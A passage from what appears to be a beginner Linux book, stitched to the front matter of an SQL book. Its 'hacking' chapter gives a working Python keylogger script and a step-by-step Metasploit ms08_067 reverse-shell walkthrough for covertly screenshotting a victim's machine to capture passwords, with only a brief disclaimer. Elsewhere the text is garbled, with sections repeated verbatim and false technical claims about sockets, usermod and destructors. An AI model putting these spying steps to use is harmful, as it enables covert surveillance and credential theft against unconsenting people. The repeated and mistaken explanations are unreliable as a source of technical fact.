Password: alice su: Authentication failure The usermod command is useful to lock and expire an account at the same time in a case where the employee might have left the company. [[email protected] ~]$ sudo usermod -L -e 1 alice A user may not be able to authenticate into the system using a password once their account has been locked. It is one of the best practices to prevent authentication of an employee to the system who has already left the organization. You can use the usermod -u username command later to unlock the account, in the event that the employee has rejoined the organization. While doing this, if the account was in an expired state, you will need to ensure that you set a new expiry date for the account as well. The nologin shell There will be instances where you want to create a user who can authenticate using a password and get a login into the system but would not need a shell to interact with the system. For example, a mail server may require a user to have an email account so that the user can login and check their emails. But it is not necessary that the user needs a login to the system to check their emails. This is where the nologin shell comes as a solution. What we do is we specify the shell for this user to point to /sbin/nologin. Once this is done, the user cannot login to the system using the direct login procedure. [[email protected] ~]# usermod - s /sbin/nologin student [[email protected] ~]# su - student Last login: Tue Mar 5 20:40:34 GMT 2015 on pts/0 The account is currently not available. By using the nologin shell for the user, you are denying the user interactive login into the system but not all access to the system. The user will still be able to use certain web applications for file transfer applications to upload or download files.

Chapter 11 Learning Linux Security Techniques To help you gain better security, and make sure your OS would always be in a “healthy” state, it’s best that you take note of the commands given below: Cross Platforms You could also do cross-platform programming for Linux. For this, you have to keep the following in mind: windows.h and winsock.h should be used as the header files. Instead of close(), closesocket() has to be used. Send () and Receive() are used, instead of read() or write(). WSAStartup() is used to initialize the library. Internet Message Protocol Host Resolutions One thing you have to keep in mind about this is that you should use the syntax gethostname() so the standard library could make the right call. This also happens when you’re trying to look for the name of a certain part of the program, and when you want to use it for larger applications. It’s almost the same as python as you could code it this way Linux Sockets What you have to understand about Linux is that it is an Open System Interconnect (OSI) Internet Model which means that it works in sockets (). In order to establish connections, you need to make use of listening sockets so that the host could make calls—or in other words, connections. By inputting listen (), the user will be able to accept () blocks on the program. This binds () the program together and makes it whole. For this, you could keep the following in mind: Server: socket()→bind()→listen()→accept()→read()→write()→ read() Send Request: write()→ read() Receive Reply: write()→ read() Establish connections: connect→ accept() Close Connection: close()→ read()

Client: socket()→connect→write()→read()→ close() Understanding basic Linux security Construct and Destruct These are connected to the descriptor of the socket that allow peer TCP Ports and peer IP Addresses to show up onscreen. Take note that this does not use other languages, except for C++, unlike its contemporaries in Linux. Destructors are then able to close any connections that you have made. For example, if you want to log out of one of your social networking accounts, you’re able to do it because destructors are around. Linux and SMTP Clients As for SMTP Client, you could expect that it involves some of the same characters above—with just a few adjustments. You also should keep in mind that this is all about opening the socket, opening input and output streams, reading and writing the socket, and lastly, cleaning the client portal up. You also have to know that it involves the following: Datagram Communication. This means that local sockets would work every time your portal sends datagrams to various clients and servers. Linux Communications. This time, stream and datagram communication are involved. Programming Sockets. And of course, you can expect you’ll program sockets in the right manner! Echo Client Set-ups In Linux, Echo Clients work by means of inserting arguments inside the socket() because it means that you will be able to use the IP together with the PF_INET function so that they could both go in the TCP socket. To set up a proper client structure, just remember you have to make a couple of adjustments from earlier codes. Linux and its Sockets You also have to understand that you can code Linux in C mainly because they both involve the use of sockets. the socket works like a bridge that binds the client to the port, and is also responsible for sending the right kinds of requests to the server while waiting for it to respond. Finally, sending and receiving of data is done.

At the same time, the Linux Socket is also able to create a socket for the server that would then bind itself to the port. During that stage, you can begin listening to client traffic as it builds up. You could also wait for the client at that point, and finally, see the sending and receiving of data to happen. Its other functions are the following: socket_description. This allows the description of both the client and the server will show up onscreen. write buffer. This describes the data that needs to be sent. write buffer length. In order to write the buffer length, you’ll have to see the string’s output. client_socket. The socket description will also show on top. address. This is used for the connect function so that address_len would be on top. address_len. If the second parameter is null, this would appear onscreen. return. This helps return description of both the client and the socket. This also lets interaction become easy between the client and the server. server_socket. This is the description of the socket that’s located on top. backlog. This is the amount of requests that have not yet been dealt with. You could also put personal comments every once in a while—but definitely not all the time! Understanding advanced Linux security Internet Protocol is all about providing boundaries in the network, as well as relaying datagrams that allow internet-networking to happen. The construction involves a header and a payload where the header is known to be the main IP Address, and with interfaces that are connected with the help of certain parameters. Routing prefixes and network designation are also involved, together with internal or external gateway protocols, too. Reliability also depends on end-to-end protocols, but mostly, you could expect the framework to be this way: UDP Header | UDP DATA→ Transport IP Header | IP Data→ Internet Frame Header | Frame Data | Frame Footer→ Link

Data→ Application Getting Peer Information In order to get peer information, you have to make sure that you return both TCP and IP information. This way, you could be sure that both server and client are connected to the network. You could also use the getpeername() socket so that when information is available, it could easily be captured and saved. This provides the right data to be sent and received by various methods involved in Linux, and also contains proper socket descriptors and grants privileges to others in the program. Some may even be deemed private, to make the experience better for the users. To accept information, let the socket TCPAcceptor::accept() be prevalent in the network. This way, you could differentiate actions coming from the server and the client. Construct and Destruct These are connected to the descriptor of the socket that allow peer TCP Ports and peer IP Addresses to show up onscreen. Take note that this does not use other languages, except for C++, unlike its contemporaries in Linux. Destructors are then able to close any connections that you have made. For example, if you want to log out of one of your social networking accounts, you’re able to do it because destructors are around. All Linux distros come with a robust selection of applications that you can use for almost all of your daily computing needs. Almost all of these applications are easily accessible using your distro’s GUI desktop. In this chapter, you will get to know some of the most common Linux applications and learn how to access them whenever you want to. You will also get to know some of the file managers used by different GUIs, which will allow you to make changes or browse files in your computer. Almost all applications used by Linux have dedicated websites in which you can find detailed information about them, including details on where and how to download them. At the same time, all distros come with different sets of utilities and apps that you can choose to install as you setup your chosen distro. If you have a missing app in a Debian or Debian-based distro, such as Ubuntu, you can easily get that application as long as you have a high-speed

internet connection. Linux and SMTP Clients As for SMTP Client, you could expect that it involves some of the same characters above—with just a few adjustments. You also should keep in mind that this is all about opening the socket, opening input and output streams, reading and writing the socket, and lastly, cleaning the client portal up. You also have to know that it involves the following: Datagram Communication. This means that local sockets would work every time your portal sends datagrams to various clients and servers. Linux Communications. This time, stream and datagram communication are involved. Programming Sockets. And of course, you can expect you’ll program sockets in the right manner! Echo Client Set-ups In Linux, Echo Clients work by means of inserting arguments inside the socket() because it means that you will be able to use the IP together with the PF_INET function so that they could both go in the TCP socket. To set up a proper client structure, just remember you have to make a couple of adjustments from earlier codes. Linux and its Sockets You also have to understand that you can code Linux in C mainly because they both involve the use of sockets. the socket works like a bridge that binds the client to the port, and is also responsible for sending the right kinds of requests to the server while waiting for it to respond. Finally, sending and receiving of data is done. At the same time, the Linux Socket is also able to create a socket for the server that would then bind itself to the port. During that stage, you can begin listening to client traffic as it builds up. You could also wait for the client at that point, and finally, see the sending and receiving of data to happen. Its other functions are the following: socket_description. This allows the description of both the client and the server will show up onscreen. write buffer. This describes the data that needs to be sent.

write buffer length. In order to write the buffer length, you’ll have to see the string’s output. client_socket. The socket description will also show on top. address. This is used for the connect function so that address_len would be on top. address_len. If the second parameter is null, this would appear onscreen. return. This helps return description of both the client and the socket. This also lets interaction become easy between the client and the server. server_socket. This is the description of the socket that’s located on top. backlog. This is the amount of requests that have not yet been dealt with. You could also put personal comments every once in a while—but definitely not all the time! Enhancing Linux security with selinux Technically speaking, Linux is not an operating system per se, as are the distros that are based on the Linux kernel. Linux supported by the larger, Free/Libre/Open Source Software community, a.k.a. FLOSS. This is also essential for security enhanced Linux (SElinux). Linux kernel version 4.0 released in 2015 is important in the integration of Selinux with the access policies. The coding has increased in length exponentially since its development. Before you get started with programming on Linux, you need to have a clear idea of what your goals are. If your goal is to make money, you can create apps that are sold for a fee. If your goal is to contribute to the community, you need to figure out what particular niche you can help fill. If you are running a large business, you may want to hire a small army of tech personnel to create patches and applications that will help to better run your business’s software. A goal is not something that a book can give you; it is something that you have to come up with yourself. What the rest of this book will give you is some of the basic know-how that you will need to get started with making those goals regarding Linux attainable. There is a permission setting that can be seen as threatening to security, which is called setuid or suid (set user ID). This permission setting applies to files that you can run, or executable files. When the setuid/suid permission is

allowed, a file is executed under the owner’s user ID. In short, if the suid permission is on and the file is owned by the root user, the targeted program will view the root user to be the one running the file and not check on who ran the program in reality. This also means that the permission for suid will allow the program to do more functions than what the owner intends all the other users to perform. It also helps to take note that if the said program that contains the suid permission has some security vulnerabilities, criminal hackers can create more havoc through these programs. To find all enabled suid permissions, you can use the find command like this:

After entering this command, you will see a list of files that appears like this example:

Take note that there are numerous programs that are set with a suid permission because they require it. However, you may want to check the entire list to make sure that there are no programs that have odd suid permissions. For example, you may not want to have suid programs located in your home directory. Here is an example: typing the ls –l /bin/su will give you the following result:

The character s in the permission setting alluded to the owner (appears as – rws) shows that the file /bin/su has suid permission. This means that the su command, which allows any user to have superuser privileges, can be used by anyone.

Chapter 12 Some Basic Hacking with Linux Now that you have hopefully gotten used to the Linux system and have some ideas of how it works and such, it is a good time to learn a little bit about hacking with Linux. whether you are using this system on your own or you have it set up with a network of other people, there are a few types of hacking that you may find useful to know how to do. This chapter is going to spend some time exploring some basic hacking endeavors on the Linux system. We want to spend some time looking at how we can work with the Linux system to help us complete some of the ethical hacking that we would like to do. While we are able to do some hacking with the help of Windows and Mac, often, the best operating system to help us out with all of this is going to be the Linux operating system. It already works on the command line, which makes things a bit easier and will have all of the protection that you need as well. And so, we are going to spend a bit of our time taking a closer look at how the Linux system is going to be able to help us out with some of the hacking we want to accomplish. There are a lot of reasons that hackers are going to enjoy working with Linux over some of the other operating systems that are out there. The first benefit is that it is open source. This means that the source code is right there and available for you to use and modify without having to pay a lot of fees or worry that it is going to get you into trouble. This open-source also allows you to gain more access to it, share it with others and so much more. And all of these can be beneficial to someone who is ready to get started with hacking as well. The compatibility that comes with Linux is going to be beneficial for a hacker as well. This operating system is going to be unique in that it is going to help us support all of the software packages of Unix and it is also able to support all of the common file formats that are with it as well. This is important when it comes to helping us to work with some of the hacking codes that we want to do later on. Linux is also designed to be fast and easy to install. There are a number of steps that we had to go through in order to get started. But when compared to some of the other operating systems this is not going to be that many and it can really help you to get the most out of this in as little time as possible. You will quickly notice that most of the distributions that you are able to do

with Linux are going to have installations that are meant to be easy on the user. And also, a lot of the popular distributions of Linux are going to come with tools that will make installing any of the additional software that you want as easy and friendly as possible too. Another thing that you might notice with this is that the boot time of the operating system of Linux is going to be faster than what we see with options like Mac and Windows, which can be nice if you do not want to wait around all of the time. When you are working on some of the hacks that you would like to accomplish, the stability of the program is going to matter quite a bit. You do not want to work with a system that is not all that stable, or that is going to fall apart on you in no time. Linux is not going to have to go through the same periodic reboots like others in order to maintain the level of performance that you would like and it is not going to slow down or freeze up over time if there are issues with leaks in the memory and more. You are also able to use this operating system for a long time to come, without having to worry about it slowing down or running into some of the other issues that the traditional operating systems will need to worry about. For someone who is going to spend their time working with ethical hacking, this is going to be really important as well. It will ensure that you are able to work with an operating system that is not going to slow down and cause issues with the protections that you put in place on it. And you will not have to worry about all of the issues that can come up with it being vulnerable and causing issues down the line as well. It is going to be safe and secure along the way, so that you are able to complete your hacks and keep things safe, without having to worry about things not always working out the way that we would hope. Another benefit that we will spend a bit of time on is how friendly the Linux network is overall. As this operating system is an option that is open source and is contributed by the team over the internet network, it is also able to effectively manage the process of networking all of the time. And it is going to help with things like commands that are easy to learn and lots of libraries that can be used in a network penetration test if you choose to do this. Add on that the Linux system is going to be more reliable and it is going to make the backup of the network more reliable and faster and you can see why so many users love to work with this option. As a hacker, you will need to spend some of your time multitasking to get all

of the work done. A lot of the codes and more that you want to handle in order to do a hack will need to have more than one thing going at a time, and Linux is able to handle all of this without you having to worry about too much going on or the computer freezing upon you all of the time. In fact, the Linux system was designed in order to do a lot of things at the same time. This means that if you are doing something large, like finishing up a big printing job in the background, it is not really going to slow down some of the other work that you are doing. Plus, when you need to handle more than one process at the same time, it is going to be easier to do on Linux, compared to Mac or Windows, which can be a dream for a hacker. You may also notice that working with the Linux system is a bit different and some of the interactions that you have to take care of are not going to be the same as what we found in the other options. For example, the command-line interface is going to introduce us to something new. Linux operating systems are going to be specifically designed around a strong and highly integrated command-line interface, something that the other two operating systems are not going to have. The reason that this is important is that it will allow hackers and other users of Linux to have more access and even more control, over their system. Next on the list is the fact that the Linux system is lighter and more portable than we are going to find with some of the other operating systems out there. This is a great thing because it is going to allow hackers with a method that will make it easier to customize the live boot disks and drives from any distribution of Linux that they would like. The installation is going to be fast and it will not consume as many resources in the process. Linux is lightweight and easy to use while consuming fewer resources overall. The maintenance is going to be another important feature that we need to look at when we are trying to do some ethical hacking and work with a good operating system. Maintaining the Linux operating system is going to be easy to work with. All of the software is installed in an easy manner that does not take all that long and every variant of Linux has its own central software repository, which makes it easier for the users to search for their software and use the kind that they would like along the way. There is also a lot of flexibility when it comes to working with this kind of operating system. As a hacker, you are going to need to handle a lot of

different tools along the way. And one of the best ways that we are able to do this is to work with an operating system that allows for some flexibility in the work that we are doing. This is actually one of the most important features in Linux because it allows us to work with embedded systems, desktop applications and high-performance server applications as well. As a hacker, you want to make sure that your costs are as low as possible. No one wants to get into the world of ethical hacking and start messing with some of those codes and processes and then find out that they have to spend hundreds of dollars in order to get it all done. And this is where the Linux system is going to come into play. As you can see from some of our earlier discussions of this operating system, it is going to be an open-source operating system, which means that we are able to download it free of cost. This allows us to get started with some of the hacking that we want to do without having to worry about the costs. If you are working with ethical hacking, then your main goal is to make sure that your computer and all of the personal information that you put into it is going to stay safe and secure all of the time. This is going to be a commandline to keep other hackers off and will make it so that you don’t have to worry about your finances or other issues along the way, either. And this is also where the Linux operating system is going to come into play to help us out. One of the nice things that we are going to notice when it comes to the Linux operating system is that it is seen as being less vulnerable than some of the other options. Today, most of the operating systems that we are able to choose from, besides the Linux option, are going to have a lot of vulnerabilities to an attack from someone with malicious intent along the way. Linux, on the other hand, seems to have fewer of these vulnerabilities in place from the beginning. This makes it a lot nicer to work with and will ensure that we are going to be able to do the work that we want on it, without having a hacker getting. Linux is seen as one of the most secure out of all the operating systems that are available and this can be good news when you are starting out as an ethical hacker. The next benefit that we are going to see when it comes to working with the Linux operating system over some of the other options, especially if you are a

hacker, is that it is going to provide us with a lot of support and works with most of the programming languages that you would choose to work on when coding. Linux is already set up in order to work with a lot of the most popular programming languages. This means that many options like Perl, Ruby Python, PHP< C++ and Java are going to work great here. This is good news for the hacker because it allows them to pick out the option that they like. If you already know a coding language or there is one in particular that you would like to use for some of the hacking that you plan to do, then it is likely that the Linux system is going to be able to handle this and will make it easy to use that one as well. If you want to spend some of your time working on hacking, then the Linux system is a good option. And this includes the fact that many of the hacking tools that we are working with are going to be written out in Linux. Popular hacking tools like Nmap and Metasploit, along with a few other options, are going to be ported for Windows. However, you will find that while they can work with Windows, if you want, you will miss out on some of the capabilities when you transfer them off of Linux. It is often better to leave these hacking tools on Linux. This allows you to get the full use of all of them and all of the good capabilities that you can find with them, without having to worry about what does and does not work if you try to move them over to a second operating system. These hacking tools were made and designed to work well in Linux, so keeping them there and not trying to force them into another operating system allows you to get the most out of your hacking needs. And finally, we are able to take a quick look at how the Linux operating system is going to take privacy as seriously as possible. In the past few years, there was a lot of information on the news about the privacy issues that would show up with the Windows 10 operating system. Windows 10 is set up to collect a lot of data on the people who use it the most. This could bring up some concerns about how safe your personal information could be. This is not a problem when we are working with Linux. This system is not going to take information, you will not find any talking assistants to help you out and this operating system is not going to be around, collecting information and data on you to have some financial gain. This all can speak volumes to an ethical hacker who wants to make sure that their information

stay safe and secure all of the time. As you can see here, there are a lot of benefits that are going to show up when it is time to work with the Linux system. We can find a lot of examples of this operating system and all of the amazing things that it is able to do, even if we don’t personally use it on our desktop or laptop. The good news is that there are a lot of features that are likely to make this operating system more effective and strong in the future, which is perfect when it comes to doing a lot of tasks, including the hacking techniques that we talked about. Making a key logger The first thing we are going to learn how to work with is a key logger. This can be an interesting tool because it allows you to see what keystrokes someone is making on your computer right from the beginning. Whether you have a network that you need to keep safe and you want to see what others are the system are typing out, or if you are using a type of black hat hacking and are trying to get the information for your own personal use, the key logger is one of the tools that you can use to make this work out easily for you. Now there are going to be a few different parts that you will need to add in here. You can download a key logger app online (git is one of the best ones to use on Linux for beginners), and while this is going to help you to get all the characters that someone is typing on a particular computer system, it is not going to be very helpful. Basically here you are going to get each little letter on a different line with no time stamps or anything else to help you out. It is much better to work this out so that you are getting all the information that you need, such as lines of text rather than each letter on a different line and a time stamp to tell you when each one was performed. You can train the system to only stop at certain times, such as when there is a break that is longer than two seconds, and it will type in all the information that happens with the keystrokes at once rather than splitting it up. A time stamp is going to make it easier to see when things are happening and you will soon be able to see patterns, as well as more legible words and phrases. When you are ready to bring all of these pieces together, here is the code that you should put into your command prompt on Linux in order to get the key logger all set up: import pyxhook

#change this to your log file’s path log_file = ‘/home/aman/Desktop/file.log’ #this function is called every time a key is pressed def OnKeyPress(event): fob = open(log_file, ‘a’) fob.write(event.Key) fob.writer(‘\n’) if event.ASCII==96: #96 is the asci value of the grave key fob.close() new_hook.cancel() #instantiate HookManager class new_hook=pyxhook.HookManager() #listen to all keystrokes new_hook.KeyDown=OnKeyPress #hook the keyboard new_hook.HookKeyboard() #start the session new_hook.start() Now you should be able to get a lot of the information that you need in order to keep track of all the key strokes that are going on with the target computer. You will be able to see the words come out in a steady stream that is easier to read, you will get some time stamps, and it shouldn’t be too hard to figure out where the target is visiting and what information they are putting in. Of course, this is often better when it is paired with a few other options, such as taking screenshots and tracking where the mouse of the target computer is going in case they click on links or don’t type in the address of the site they are visiting, and we will explore that more now! Getting screenshots Now, you can get a lot of information from the key strokes, but often these are just going to end up being random words with time stamps accompanying

them. Even if you are able to see the username and password that you want, if the target is using a link in order to get their information or to navigate to a website, how are you supposed to know where they are typing the information you have recorded? While there are a few codes that you can use in order to get more information about what the target is doing, getting screenshots is one of the best ways to do so. This helps you to not only get a hold of the username and passwords based on the screenshots that are coming up, but you are also able to see what the target is doing on the screen, making the hack much more effective for you. Don’t worry about this sounding too complicated. The code that you need to make this happen is not too difficult and as long as you are used to the command prompt, you will find that it is pretty easy to get the screenshots that you want. The steps that you need to take in order to get the screenshots include: Step1: set the hack up First, you will need to select the kind of exploit that you need to use. A good exploit that you should consider using is the MS08_067_netapi exploit. You will need to get this one onto the system by typing: msf > use exploit/windows/smb/ms08_067_netapi Once this is on the system, it is time to add in a process that is going to make it easier to simplify the screen captures. The Metasploit’s Meterpreter payload can make things easier to do. in order to get this to set up and load into your exploit, you will need type in the following code: msf> (ms08_067_netapi) set payload windows/meterpreter/reverse_tcp The following step is to set up the options that you want to use. A good place to start is with the show options command. This command is going to let you see the options that are available and necessary if you would like to run the hack. To get the show options command to work well on your computer, you will need to type in the following code: msf > (ms08_067_netapi) show options At this point, you should be able to see the victim, or the RHOST, and the attacker or you, the LHOST, IP addresses. These are important to know when you want to take over the system of another computer because their IP

address will let you get right there. The two codes that you will need in order to show your IP address and the targets IP address so that you can take over the targets system includes: msf > (ms08_067_netapi) set RHOST 192.168.1.108 msf > (ms08_067_netapi) set LHOST 192.168.1.109 Now if you have gone through and done the process correctly, you should be able to exploit into the other computer and put the Meterpreter onto it. The target computer is going to be under your control now and you will be able to take the screenshots that you want with the following steps. Step 2: Getting the screenshots With this step, we are going to work on getting the screenshots that you want. But before we do that, we want to find out the process ID, or the PID, that you are using. To do this, you will need to type in the code: meterpreter > getpid The screen that comes up next is going to show you the PID that you are using on the targets computer. For this example we are going to have a PID of 932, but it is going to vary based on what the targets computer is saying. Now that you have this number, you will be able to check which process this is by getting a list of all the processes with the corresponding PIDs. To do this, you will just need to type in: meterpreter > ps When you look at the PID 932, or the one that corresponds to your targets particular system, you will be able to see that it is going to correspond with the process that is known as svrhost.exe. Since you are going to be using a process that has active desktop permissions in this case, you will be ready to go. If you don’t have the right permissions, you may need to do a bit of migration in order to get the active desktop permissions. Now you will just need to activate the built in script inside of Meterpreter. The script that you need is going to be known as espia. To do this, you will simply need to type out: meterpreter > use espia Running this script is just going to install the espia app onto the computer of your target. Now you will be able to get the screenshots that you want. To get

a single screenshot of the target computer, you will simply need to type in the code: meterpreter > screengrab When you go and type out this code, the espia script that you wrote out is basically going to take a screenshot of what the targets computer is doing at the moment, and then will save it to the root user’s directory. You will then be able to see a copy of this come up on your computer. You will be able to take a look at what is going on and if you did this in the proper way, the target computer will not understand that you took the screenshots or that you aren’t allowed to be there. You can keep track of what is going on and take as many of the different screenshots that you would like. These screenshots are pretty easy to set up and they are going to make it easier than ever to get the information that you need as a hacker. You will not only receive information about where the user is heading to, but also what information they are typing into the computer. Keep in mind that black hat hacking is usually illegal and it is not encouraged in any way. While the black hat hackers would use the formulas above in order to get information, it is best to stay away from using these tactics in an illegal manner. Learning these skills however can be a great way to protect yourself against potential threats of black hat hackers. Also, having hacking skills allows you to detect security threats in the systems of other people. Being a professional hacker can be a highly lucrative career, as big companies pay a lot of money to ensure that their system is secure. Hacktesting systems for them is a challenging, and fun way to make a living for the skilled hackers out there!

Chapter 13 Types of Hackers All lines of work in society today have different forms. You are either blue collar, white collar, no collar…whatever. Hacking is no different. Just as there is different kinds of jobs associated with different kinds of collar colors, the same goes for hacking. Hackers have been classified into many different categories, black hat, white hat, grey hat, newbies, hacktivists, elites, and more. Now, to help you gain a better understanding as to what grey hacking is, let’s first take a look at these other kinds of hacking, so you can get a feel for what it is hackers do, or can do, when they are online. Newbies The best place to start anything is at the beginning, which is why we are starting with the newbie hackers. The problem with a lot of newbie hackers is that they think they have it all figured out when they really don’t. The idea of hacking is really only scratching the surface when it comes to everything that is involved, and it is not at all uncommon for people who want to get into it to get overwhelmed when they see what really needs to be learned. Don’t let that discourage you, however, you are able to learn it all, it just takes time and effort on your part. Borrow books and get online. Look up what needs to be and remember it. Don’t rush yourself. You need to learn, and really learn. Anything that you don’t remember can end up costing you later. There are immediate reactions when it comes to the real world of hacking, and sitting there trying to look up what you should have already known is not going to get you far as a hacker. If you want to be good at what you do, then take the time required to be good at it. Don’t waste your time if you don’t think you really want to learn it, because it is going to take a lot of your concentration to get to the heart of the matter. Don’t get me wrong, it is more than worth it, but if you are only looking into it for curiosity sake, don’t do it unless knowing really means that much to you. Sure there are those that kind of know what they are doing, or they can get into their friend’s email account, but that is not the hacking I am talking

about here. I want you to become a real life, capable hacker, and that isn’t going to happen unless you are willing to take the time needed to learn it, and put forth the effort to learn it. You have to remember that any hacker that is in existence had to start as a newbie hacker, and build up their skills from there. Now, as fast they built those skills depended greatly on how much time and effort they put into working on it, but don’t worry, you will get the hang of things, and while you have to start as a newbie, you will have Grey Hat status soon enough. Elites As with the newbie hackers, elite hackers can be any kind of hacker, whether that be good or bad. What makes them elite is the fact they are good at what they do, and they know it. There is a lot of respect for elite hackers online. Just like with elite anything, they know what they are doing, and they know that others can’t challenge them unless they too know how to handle themselves. There is a level of arrogance that goes with the status, but it is well deserved. Anyone can stop at second best, but it takes true dedication to reach the top. An elite hacker can use their powers for good or bad, but they are a force to be reckoned with either way. They know the way systems work, how to work around them, and how to get them to do what they want them to do. If you have a goal of becoming an elite hacker, you do have your work cut out for you, but don’t worry, you will get there. It only takes time and effort to get this top dog status, and it comes to those who want it. No one ‘accidently’ achieves elite status, it is something that they had to work for, but it is definitely worth all of the time and effort that is put into it. As an elite hacker, you won’t have to worry about whatever system you run into, you will know what is coming, and how you can work around it, it just comes with the line of work. Hacktivists Hacktivist hackers use their skills to promote a social or political agenda. Sometimes they are hired by specific groups to get into places online and gather information, sometimes they work all on their own.

The point of this kind of hacking is to make one political party look bad, and the one that the hacker promotes to look good. Then, they either publish it elsewhere online, or they pass it along so others can see what the person has done or what they are accused of doing. It is a way for politicians to make jabs at each other, and it isn’t really playing the game fairly. The hacker then is either payed by the party that hired them, or, if they are working for themselves, they get to see the results of what they posted about the politician. The list of hackers and what they do is one that goes on and on, but they all can ultimately fit into three categories, being the black hat, white hat, and grey hats. No matter what kind of hacker they are on top of it, these are the three realms that are really all encompassing. This is because these are not only hackers in and of themselves, but they are also characteristics of every king of hacker out there. Whether they are doing things for good, for bad, or doing good things without permission, these are really what hacking comes down to. Black hat The black hat hacker is likely the most famous of the hacking world, or rather, infamous. This is the line of hacking that movies tend to focus on, and it is the line of hacking that has given all hacking a bad name. A black hat hacker is a hacker that is getting into a system or network to cause harm. They always have malicious intent, and they are there to hurt and destroy. They do this by either stealing things, whether it be the person’s information, the network’s codes, or anything else they find that is valuable to them, or they can do it by planting worms and viruses into the system. There have been viruses planted into various systems throughout history, causing hundreds of thousands of dollars’ worth of damage, and putting systems down for days. Viruses are programs that hackers create, then distribute, that cause havoc on whatever they can get a grip on. They often times disguise themselves to look like one thing, and they prompt you to open them in whatever way they can. Then, once you do open the link, they get into the hard drive of your system and do whatever they want while they are in there. Many viruses behave like

they have a mind of their own, and you would be surprised at the harm they can cause. There is a certain kind of virus, known as a ‘backdoor’ virus, which allows its sender to then have access to and control of whatever system it has planted itself into. It is as though the person who owns the system is nothing more than a bystander who can do nothing but watch as the virus takes its toll on the system. Hackers will use these viruses for a number of reasons, and none of them are very good for you. When a hacker has access to your computer, they can then do whatever they like on there. They can get into your personal information, and use that for their own gain. They can steal your identity, they can do things that are illegal while they are on your computer, and thus make it look like you were the one who did it, and get out of the suspicion by passing all the blame onto you. These are really hard viruses to get rid of, and it is of utmost importance that you do whatever you can to protect yourself on the outset to make sure you don’t get one of these viruses. However, if you do happen to get one, there is hope. You may have to get rid of a lot of your system, or close it down and restart it entirely, but it is always better to do that then to let a hacker have access to anything you are doing. Black hat hackers are malicious. They only do what they do to harm others and cause mischief. It is unfortunate that they do what they do, as this is what made hacking fall under a bad light, but there is hope, because wherever there is a bad thing, there is also some good to be found, and that good comes in the form of the white and grey hat hackers. b. White hat The white hat hacker and the grey hat hacker are really similar, but there are key differences that make them separate categories. The white hat hacker is a person who is hired by a network or company to get into the system and intentionally try to hack it. The purpose of this is to test the system or network for weakness. Once they are able to see where hackers can get in, they can fix it and make it more difficult for the black hat hackers to break in. They often do this through a form of testing known as Penetration Testing,

but we will look more on that later. White hat hackers always have permission to be in the system they are in, and they are there for the sole purpose of looking for vulnerabilities. There is a high enough demand for this line of work that there are white hat hackers that do it for a full time job. The more systems go up, and more hackers are going to try to break into them. The more hackers that try to do that, the more companies are going to need white hat hackers to keep them out. Companies aren’t too picky on who they hire to work for them, either, so it is remarkable that so many hackers will choose to go down the black hat path. They could be making decent wages by working for people and getting paid for what they do, but unfortunately not many people see it this way, and they would rather hack for their own selfish gain than to do what would help others. To put it simply, however, it can be broken down to a very basic relationship. Black hackers try to get in, white hackers try to keep them out. Sometimes the black hats have the upper hand, then there are times when it goes to the whites. It is like a codependent relationship of villain and super hero, where you are rooting for one but the other still manages to get what they want every once in a while. It is a big circle that works out in the end. Of course it would be a lot easier if black hat hackers would stop breaking into the systems in the first place, but unfortunately that isn’t going to happen. c. Grey hat The world is often portrayed as being full of choices that are either right or wrong. You can do it one way, or you can do it any way but that one right way…thus making you wrong. Right and wrong, black and white. Yet…what about those exceptions to the rule? There is an exception to pretty much every rule in existence, and hacking is no exception. Grey hat hackers fall into this realm. Whether they are right to do what they do or wrong to do what they do is up to the individual to decide, because it is a grey area. To clarify what I mean, think about it this way. Black hat hackers get into

networks without permission to cause harm. That is bad. Very bad. White hat hackers get into systems with permission to cause protection. That is good. Very good. But then you have the grey hat hackers. Grey hat hackers get into a system without permission…which is bad, but they get into that system to help the company or network…which is good. So, in a nutshell, grey hat hackers use bad methods to do good things. Which, in turn, should make the whole event a good thing. Many people feel that it is the grey hat hackers that do the best job of keeping the black hat hackers at bay, but there are still those that argue the grey hats should not do what they do because they have no permission to do it. What is important and universal is the fact that a grey hat hacker never does anything malicious or bad to a system, in fact, they do every bit as good as the white hat hackers for those who are in charge of the network, but they do it for free. In a way, the grey hat hackers can be considered the robin hoods of hacking, doing what they can to help people, unasked, and unpaid, and largely without a ‘thank you’ even.

Conclusion So you’ve worked through my book. Congratulations! You have learnt all you need to learn to become a perfect Linux command line ninja. You have acquired powerful and really practical skills and knowledge. What remains is a little experience. Undoubtedly, your bash scripting is reasonably good now but you have to practice to perfect it. This book was meant to introduce you to Linux and the Linux command line right from scratch, teach you what you need to know to use it properly and a bit more to take you to the next level. At this point, I can say that you are on your way to doing something great with bash, so don’t hang your boots just yet. The next step is to download Linux (if you haven’t done so yet) and get started with programming for it! The rest of the books in this series will be dedicated to more detailed information about how to do Linux programming, so for more high-quality information, make sure you check them out.

SQL COMPUTER PROGRAMMING FOR BEGINNERS: LEARN THE BASICS OF SQL PROGRAMMING WITH THIS STEP-BY-STEP GUIDE IN A MOST EASILY AND COMPREHENSIVE WAY FOR BEGINNERS INCLUDING PRACTICAL EXERCISE.

JOHN S. CODE © Copyright 2019 - All rights reserved. The content contained within this book may not be reproduced, duplicated or transmitted without direct written permission from the author or the publisher. Under no circumstances will any blame or legal responsibility be held against the publisher, or author, for any damages, reparation,

or monetary loss due to the information contained within this book. Either directly or indirectly. Legal Notice: This book is copyright protected. This book is only for personal use. You cannot amend, distribute, sell, use, quote or paraphrase any part, or the content within this book, without the consent of the author or publisher. Disclaimer Notice: Please note the information contained within this document is for educational and entertainment purposes only. All effort has been executed to present accurate, up to date, and reliable, complete information. No warranties of any kind are declared or implied. Readers acknowledge that the author is not engaging in the rendering of legal, financial, medical or professional advice. The content within this book has been derived from various sources. Please consult a licensed professional before attempting any techniques outlined in this book. By reading this document, the reader agrees that under no circumstances is the author responsible for any losses, direct or indirect, which are incurred as a result of the use of information contained within this document, including, but not limited to, — errors, omissions, or inaccuracies.

Table of Contents

Introduction Chapter 1 Relational Database Concepts Chapter 2 SQL Basics Chapter 3 Some of the Basic Commands We Need to Know Chapter 4 Installing and configuring MySql on your system Chapter 5 Data Types Chapter 6 SQL Constraints Chapter 7 Databases Chapter 8 Tables Chapter 9 Defining Your Condition Chapter 10 Views Chapter 11 Triggers Chapter 12 Combining and Joining Tables Chapter 13 Stored Procedures and Functions Chapter 14 Relationships Chapter 15 Database Normalization Chapter 16 Database Security and Administration Chapter 17 Real-World Uses Conclusion

